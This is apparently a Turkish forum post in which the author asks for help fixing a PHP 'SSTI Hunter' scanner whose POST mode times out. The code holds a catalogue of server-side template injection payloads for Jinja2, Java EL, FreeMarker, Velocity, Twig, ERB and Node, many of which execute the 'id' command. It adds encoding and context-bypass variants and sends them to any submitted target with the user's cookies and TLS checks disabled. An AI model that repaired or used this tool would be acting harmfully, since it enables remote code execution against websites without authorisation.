Şöyle bir scriptim var arkadaşlar. Mantık şu: bir input alanı var, benim verdiğim listedekileri deniyor ve bana sonuçları çıkartıyor. GET isteği olanlarda sorun yok ama POST isteği olanlarda timeout hatası alıyorum. Gemini v47 yaptı, hâlâ çalışmıyor; ChatGPT de illegal diyor.
<?php
/**
* SSTI Hunter v43.0 - pwdec "THE ABSOLUTE OVERLORD: FINAL SINGULARITY"
* Mimari: Multi-Method Atomic Scan & Full Context Bypass
* Platform: cPanel, XAMPP, Localhost Optimized
*/
// Runtime setup for the page.
// Report every error class and print errors into the response. This is a
// debugging configuration: it also shows file paths and warnings to whoever
// loads the page.
error_reporting(E_ALL);
ini_set('display_errors', '1');

// The request loop further down needs the cURL extension; stop here without it.
if (!extension_loaded('curl')) {
    die("CRITICAL: CURL is missing!");
}

// Raise the memory ceiling to 2 GB and remove the execution-time cap, so a
// single request to this page can keep the PHP worker busy indefinitely.
ini_set('memory_limit', '2G');
set_time_limit(0);
/**
 * Static holder for the scanner's catalogue of template-injection test
 * strings and for the routine that derives encoded variants of them.
 * Neither method performs I/O; both only build and return arrays of strings.
 */
class FinalSingularity {
/**
 * Returns the catalogue of test strings, keyed by a label naming the
 * template-engine family each group is aimed at.
 *
 * The first and last groups hold arithmetic and delimiter probes (7*7 in
 * several delimiter styles). The other groups hold engine-specific
 * expressions, several of which try to run the `id` command if the receiving
 * application evaluates them.
 *
 * @param string $w Trailing slashes are trimmed, after which the value is
 *                  not referenced again in this method; the returned list
 *                  does not depend on it.
 * @return array Map of family label => list of test strings.
 */
public static function getDatabase($w = "") {
$w = rtrim($w, '/');
// All test strings are kept here; none were removed.
return [
// Arithmetic probes: the same 7*7 expression wrapped in different delimiters.
"Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'],
"Python (Jinja2/Mako/Django)" => [
'{{' . 'config.items()}}', '{{' . 'self.__dict__}}',
'{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}',
'${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}'
],
"Java (EL/FreeMarker/Velocity)" => [
'${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}',
'${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}',
'<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}',
'#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))'
],
"PHP (Twig/Smarty/Blade)" => [
'{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}',
'{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
'{' . 'smarty.template_vars}'
],
"Ruby & JS (ERB/EJS/Slim)" => [
'<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>',
'{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}'
],
"Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}']
];
}
/**
 * Builds the encoded variants of one test string.
 *
 * The 'Raw' entry is always present. Every other entry is added only when
 * its option key appears in $opts; in_array() is called without the strict
 * flag, so the membership test uses loose comparison.
 *
 * @param string $p    One test string.
 * @param array  $opts Option keys; the ones read here are 'url', 'double',
 *                     'hex', 'uni', 'dec' and 'ctx'.
 * @return array Map of variant label => encoded string.
 */
public static function applyMatrix($p, $opts) {
$m = ['Raw' => $p];
// Single and double percent-encoding of the whole string.
if (in_array('url', $opts)) $m['URL'] = urlencode($p);
if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p));
// Byte-wise encodings: '%' + hex, '\u00' + hex, and comma-separated decimal codes.
if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . dechex(ord($p[$i])); $m['Hex'] = $h; }
if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; }
if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); }
// Three wrappers that surround the string with quote/statement or template-tag terminators.
if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; }
return $m;
}
}
// Request handler. On a POST that carries `launch`, it sends one HTTP request
// to the submitted URL for every (parameter, test string, encoding variant)
// combination and records which responses match a marker pattern.
//
// NOTE(review): nothing in this block checks who is submitting the form or
// which host `url` points to. Any client that can reach this page can make
// this server issue requests to arbitrary URLs (a server-side request forgery
// surface). No CURLOPT_PROTOCOLS restriction is set either, so the scheme is
// whatever the submitted string carries.
$results = [];
$stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) {
// All of the following values are taken from the form as submitted, unvalidated.
$target = $_POST['url'];
$params = array_filter(array_map('trim', explode(',', $_POST['params'])));
$webhook = $_POST['webhook'] ?? "";
// Defaults to the 'url' variant only; the submitted value's type is not checked.
$opts = $_POST['opts'] ?? ['url'];
// Used verbatim as the HTTP method for every non-GET request (see CURLOPT_CUSTOMREQUEST below).
$method = $_POST['method'];
$cookies = $_POST['cookies'] ?? "";
$headers = array_filter(array_map('trim', explode("\n", $_POST['headers'])));
$only_vuln = isset($_POST['only_vuln']);
$db = FinalSingularity::getDatabase($webhook);
// Nested iteration: parameter name -> engine family -> test string -> encoding variant.
foreach ($params as $pr) {
foreach ($db as $cat => $list) {
foreach ($list as $raw) {
$vars = FinalSingularity::applyMatrix($raw, $opts);
foreach ($vars as $mode => $final) {
$stats['total']++;
// A fresh cURL handle is created and closed for every single request.
$ch = curl_init();
$payload_data = ["$pr" => $final];
$url = $target;
if ($method === 'GET') {
// GET: the parameter is appended to the query string.
$url .= (strpos($url, '?') ? '&' : '?') . http_build_query($payload_data);
} else {
// Any other method: the parameter is sent as a form-encoded body.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload_data));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
// NOTE(review): CURLOPT_SSL_VERIFYPEER => 0 turns off certificate
// verification, so the submitted cookies are sent to, and responses accepted
// from, whichever host terminates the TLS connection.
// CURLOPT_HEADER => 1 makes the response headers part of the returned string;
// each request is capped at 15 seconds.
$curl_configs = [
CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_HEADER => 1, CURLOPT_COOKIE => $cookies
];
// $curl_configs never holds CURLOPT_HTTPHEADER at this point, so when custom
// headers are present this entry is exactly $headers, and applying it replaces
// the header list set on the handle in the non-GET branch above.
if ($headers) $curl_configs[CURLOPT_HTTPHEADER] = array_merge($curl_configs[CURLOPT_HTTPHEADER] ?? [], $headers);
curl_setopt_array($ch, $curl_configs);
// A failed transfer (false) is cast to an empty string.
$resp = (string)curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
// Drop the response headers, keeping only the body.
$body = substr($resp, $info['header_size']);
// Heuristic marker match, case-insensitive. The bare "49" alternative also
// matches any page that merely contains those two digits, so a flagged row is
// a candidate to be verified by hand, not a confirmed finding.
$v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body);
if ($v) $stats['vuln']++;
if (!$only_vuln || $v) {
// Values are stored raw; they must be escaped where the report is rendered.
$results[] = [
'p' => $pr, 'cat' => $cat, 'm' => $mode, 'pld' => $final,
'st' => $info['http_code'], 'len' => strlen($body), 'v' => $v, 'u' => ($method === 'GET' ? $url : $target)
];
}
// Pause 250 ms after an HTTP 500 before sending the next request.
if ($info['http_code'] == 500) usleep(250000);
gc_collect_cycles();
}
}
}
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>SSTI Sovereign Final v43.0</title>
<style>
:root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; }
body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; }
.box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); }
h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; }
input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; }
input:focus { border-color: var(--blue); }
.checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); }
.btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; }
.btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); }
.stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; }
.stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); }
table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; }
th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; }
td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; }
.v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; }
.action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; }
</style>
</head>
<body>
<div class="box">
<h1>>> pwdec_SSTI_SOVEREIGN_v43.0</h1>
<form method="POST">
<div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;">
<div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Params</label><input type="text" name="params" value="id,template,q" required></div>
<div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div>
</div>
</div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div>
<div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div>
</div>
<div class="checks">
<label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label>
<label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label>
<label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label>
<label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label>
<label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label>
<label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label>
</div>
<button type="submit" name="launch" class="btn">Execute Absolute Final Strike</button>
</form>
</div>
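<?php
// Results section, rendered only for POST requests.
//
// Every value written into the markup is HTML-escaped here. The parameter
// names, the target URL and the test strings all come from the submitted form
// or contain quotes and angle brackets, and the family labels contain "&".
// The original wrote the URL and labels unescaped and placed the test string
// inside an inline JavaScript string literal using addslashes(), which does
// not stop a double quote from terminating the surrounding HTML attribute.
$escapeHtml = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<div class="stats-bar">
<div class="stat-item"><span class="stat-val"><?= (int) $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div>
<div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= (int) $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div>
<div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div>
<div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div>
</div>
<div class="box">
<table>
<thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead>
<tbody>
<?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?>
<?php foreach ($results as $r): ?>
<?php
// Only http(s) URLs are rendered as a link. The URL is whatever was typed into
// the form, and another scheme (for example javascript:) in an href would run
// in this page's origin when clicked.
$linkable = preg_match('#^https?://#i', (string) $r['u']) === 1;
?>
<tr class="<?= $r['v'] ? 'v-row' : '' ?>">
<td><?= $escapeHtml($r['p']) ?></td><td><?= $escapeHtml($r['cat']) ?></td><td><?= $escapeHtml($r['m']) ?></td>
<td><?= (int) $r['st'] ?></td><td><?= (int) $r['len'] ?> B</td>
<td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= $escapeHtml($r['pld']) ?></td>
<td>
<?php // The string travels in a data attribute (HTML context only) and is read back through the DOM, so it is never parsed as script source. ?>
<button class="action-btn" data-pld="<?= $escapeHtml($r['pld']) ?>" onclick="navigator.clipboard.writeText(this.dataset.pld); alert('Kopyalandı!')">COPY</button>
<?php if ($linkable): ?>
<?php // rel="noopener noreferrer" keeps the opened page from reaching window.opener and from receiving this page's address as Referer. ?>
<a href="<?= $escapeHtml($r['u']) ?>" target="_blank" rel="noopener noreferrer" class="action-btn">GO</a>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>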
</body>
</html>